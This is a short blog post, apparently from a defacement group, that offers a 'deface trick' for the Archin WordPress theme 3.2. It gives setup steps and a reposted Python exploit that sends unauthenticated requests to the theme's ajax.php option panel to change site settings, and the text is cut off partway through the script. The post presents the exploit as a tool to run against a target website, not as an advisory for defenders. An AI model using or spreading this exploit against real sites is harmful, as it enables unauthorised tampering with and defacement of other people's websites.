Showing posts from August 2013

Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Welcome to the IDCA blog :D Let's get straight to it: here I'm sharing a deface trick for the "Wordpress Theme Archin", but since I'm too lazy to type, I just copy-pasted it from Mr Xenophobic's blog. With your permission, bro XD XD. OK, moving on. The tools needed are:

Python

Install Python. Once Python is installed, open Notepad and paste the following script:

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = " target website "
# path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': opt...